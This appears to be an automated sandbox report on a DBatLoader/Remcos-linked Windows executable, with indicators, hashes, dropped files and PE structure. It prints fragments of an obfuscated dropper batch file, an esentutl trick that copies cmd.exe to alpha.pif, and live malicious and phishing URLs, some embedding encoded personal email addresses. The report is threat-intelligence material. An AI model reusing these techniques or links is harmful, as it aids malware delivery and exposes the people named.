                                                  https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25Get hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  FW Cardenas Leslie shared Mathis IDS Remittance Copy with you.msgGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  Malicious PDF.pdfGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  https://progressiverealtypartners-my.sharepoint.com/:u:/g/personal/tim_prpmgmt_com/EdZinr2CPWZEuxpjzT68pWkB_BXb703gHPyGyIw4BgsN9Q?e=R4oSZ5Get hashmaliciousUnknownBrowse
                                                  • 13.107.136.10

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CENTURYLINK-US-LEGACY-QWESTUSfbot.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 208.45.0.29
                                                  fbot.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 71.32.39.76
                                                  fbot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 209.26.46.107
                                                  fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 67.144.93.84
                                                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                  • 63.229.122.202
                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                  • 97.117.89.67
                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                  • 71.218.36.20
                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 167.76.6.254
                                                  arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 184.1.180.119
                                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 76.7.176.213
                                                  AARNET-AS-APAustralianAcademicandResearchNetworkAARNefbot.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.33.85.33
                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                  • 103.163.8.163
                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                  • 138.46.245.63
                                                  apep.arm6.elfGet hashmaliciousMiraiBrowse
                                                  • 103.172.4.105
                                                  sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 130.222.69.184
                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                  • 103.174.152.66
                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                                  • 103.174.152.66
                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                                  • 103.174.152.66
                                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 103.186.137.204
                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                  • 103.0.31.214
                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 204.79.197.203
                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                  • 23.101.168.44
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 13.107.246.63
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 20.75.60.91
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 94.245.104.56
                                                  FW Expiration Pending Support Care HIPAA Acknowledgement Form 2024.emlGet hashmaliciousUnknownBrowse
                                                  • 52.109.76.243
                                                  https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 13.107.246.63
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 51.104.15.253
                                                  https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.orgGet hashmaliciousHTMLPhisherBrowse
                                                  • 52.98.61.50
                                                  fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 13.107.240.53

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 13.107.136.10
                                                  • 162.19.139.102

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\Public\alpha.pifnft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                    RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                      IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                  x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                    TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\Public\Libraries\PNO

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:pvn:Bn
                                                                      MD5:778300BD8587672716B777C1C3F07C14
                                                                      SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                      SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                      SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:29..

                                                                      C:\Users\Public\Libraries\Selebzih

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):804168
                                                                      Entropy (8bit):7.389101892224455
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ih27Kvc3GnLrlkBBBm4UVSZeKYnijQySTMXm5pJO88b8NyUV/HxNnrpEGOFz9cWj:N77YdqBaVdTijQzTQ0i87NfVhIFBe+Z
                                                                      MD5:6D48D5B4A6E4DFA2497101012016CF64
                                                                      SHA1:06BB4C483D284976FB2CCC76DE8EF1B44D1F0D8F
                                                                      SHA-256:C348DAD4A637ED1784B5A1156FFBECE2A09419010DF7E63FEBF7B098838EAFF4
                                                                      SHA-512:001ECBA09C2B465106C0A5CD35E8D54B39102171EDB01603FD2D664D24790B3B1C65BC9E1E03F993992697D9F1AE021FCCFF60581868B3753108CA59F55854AD
                                                                      Malicious:true
                                                                      Preview:...Y#..K. .%..'..!'...%...........&#$......".'............'..... .... ..%.&.....%......!..'.'......Y#..K.....'..!.....Y#..K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................B...0"+.@...<"................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\Public\Libraries\Selebzih.PIF

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1243648
                                                                      Entropy (8bit):7.222099898338502
                                                                      Encrypted:false
                                                                      SSDEEP:24576:HZVgZqK0ycvp/WLq7frG1Pjc8sfe93uhoKg97y4zuaRacKHT7:Hri0HvELqW1PjKK3cg9XzuaReX
                                                                      MD5:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      SHA1:48D25BBC2E65BD22678CA45D2B53B4CA8CE8059F
                                                                      SHA-256:0225DCD9B2E37389E781D34D3027A1882ADA68B4282089105BC637F4D8139561
                                                                      SHA-512:C877CB2B51DBF234C5BCA14F520D8BD42D8D5690E2F4F3D9AC07700E190FDBBBD4B52A6B0D1B71284F0B277F625D6B60F8F3B086ADE1E7F7FC4347CF6AF6E6DF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@........................... ...%...........................p...k...........................`.......................'...............................text............................... ..`.itext..L........................... ..`.data....... ......................@....bss.....6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...k...p...l..................@..B.rsrc................P..............@..@....................................@..@................................................................................................

                                                                      C:\Users\Public\Libraries\hizbeleS.cmd

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):62357
                                                                      Entropy (8bit):4.705712327109906
                                                                      Encrypted:false
                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                      Malicious:false
                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                      C:\Users\Public\Selebzih.url

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Selebzih.PIF">), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):104
                                                                      Entropy (8bit):5.086136146513478
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMC/MTsbxm5cPR:HRYFVmTWDyztMTExm+R
                                                                      MD5:6EE47F0C6F89FDC74EF14A6A1F994ABC
                                                                      SHA1:EC900C29BA156AE22322E142C395073B65AC8408
                                                                      SHA-256:EB5CFC90903A9C5952386847165EB0F35DB7355AB437D4584CFA6468863DB3D0
                                                                      SHA-512:2BD586BB5EFA6F51ED75FC0D7188ACC34512141D354CD0B6E2E83428506C9BAADAC97D3E794BB68227676FC75DA7CE1C0D3E0FD8539286A9A3986BD1A5EE093A
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Selebzih.PIF"..IconIndex=970139..HotKey=34..

                                                                      C:\Users\Public\alpha.pif

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):236544
                                                                      Entropy (8bit):6.4416694948877025
                                                                      Encrypted:false
                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: nft438A5fN.exe, Detection: malicious, Browse
                                                                      • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                      • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                      • Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Browse
                                                                      • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                      • Filename: x.exe, Detection: malicious, Browse
                                                                      • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                      \Device\ConDrv

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):589
                                                                      Entropy (8bit):4.65719623812716
                                                                      Encrypted:false
                                                                      SSDEEP:12:q6xTztMReSbZ7u0wxDDDDDDDDjCaY56aYAmVV4TB8NGNVG:rxTztMRp7u0wQak6ag/4t8ND
                                                                      MD5:35DC55A912DE411B7A2252EE84D2B0DF
                                                                      SHA1:C76CCD6F3B14D26260AA27D6E2491B9D932D5080
                                                                      SHA-256:E4478237DB114491BADBCF0DDB6F4D43FC711D8F84B6B9E8AC56E8F8590DBA55
                                                                      SHA-512:D83D1453762727330A595D6637148ACD209487BEA6384A19E4CD8E75A06D04470ED40A6885F42DE692092F2D431ED67AC65BF4F9003F1FDA6CBFC537C80FA180
                                                                      Malicious:false
                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\jlPBMMQbXC.exe...Desusertion File: C:\\Users\\Public\\Libraries\\Selebzih.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12fa00 (1243648) (1 MB)....Total bytes written = 0x130000 (1245184) (1 MB).......Operation completed successfully in 0.406 seconds.....

                                                                      \Device\Null

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):564
                                                                      Entropy (8bit):4.563144721515264
                                                                      Encrypted:false
                                                                      SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNc:/pLExT6cp7u0wQakn4al4t8N9
                                                                      MD5:5C3C5D404242B69461B6D20D2CBFC7A6
                                                                      SHA1:5BBC33F8FC5AF5C5C4F5A17F28345A1B7D07C68C
                                                                      SHA-256:F4D32853D80EBEC3AA0A13DA1C986D5371F49917ECDFF042EDFD36DDEA495DC4
                                                                      SHA-512:0D09E396C9FBF870EC33464BB4DAF23D0F9DDBF71D0B7C368E01A7998B903A3AD9EB8D5AA752682DAC5802993ADA871F185959D1F9B08AFAC966BB9C100C8775
                                                                      Malicious:false
                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Desusertion File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 1.32 seconds.....

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.222099898338502
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      File name:jlPBMMQbXC.exe
                                                                      File size:1'243'648 bytes
                                                                      MD5:a27b6de588ad4d4c0d6e0c656e580f4e
                                                                      SHA1:48d25bbc2e65bd22678ca45d2b53b4ca8ce8059f
                                                                      SHA256:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561
                                                                      SHA512:c877cb2b51dbf234c5bca14f520d8bd42d8d5690e2f4f3d9ac07700e190fdbbbd4b52a6b0d1b71284f0b277f625d6b60f8f3b086ade1e7f7fc4347cf6af6e6df
                                                                      SSDEEP:24576:HZVgZqK0ycvp/WLq7frG1Pjc8sfe93uhoKg97y4zuaRacKHT7:Hri0HvELqW1PjKK3cg9XzuaReX
                                                                      TLSH:5C45F411E3B0F0F7D1B34539DF2A52E4693D6A2C2A1468772BA61A084F277907E3F15E
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:276ea3a6a6b7bfbf

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x471804
                                                                      Entrypoint Section:.itext
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:496d9ab5600002558fd60544a4b5b68f

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00470754h
                                                                      call 00007F5EA191B031h
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F5EA196ACC5h
                                                                      mov ecx, dword ptr [0047D174h]
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [004703ECh]
                                                                      call 00007F5EA196ACC5h
                                                                      mov eax, dword ptr [0047D264h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F5EA196AD39h
                                                                      call 00007F5EA1919098h
                                                                      lea eax, dword ptr [eax+00h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x820000x25f8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000xaaa00.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x6bbc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x860000x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x827000x5e8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x6f98c0x6fa006ab7774c8901a80d5c3dc88773ff88ffFalse0.5257340075587906data6.557205887281596IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .itext0x710000x84c0xa00f1fc9ea2c6631acfba33944b9296cbdbFalse0.5296875data5.609468715893446IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .data0x720000xb3f00xb400432aa6ccbb472918c8676a04fef565ceFalse0.098828125data2.0105427853738016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .bss0x7e0000x36c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata0x820000x25f80x260082fa8fedebb0af610ab0bbe44dc413f0False0.32308799342105265data5.163147043665758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .tls0x850000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
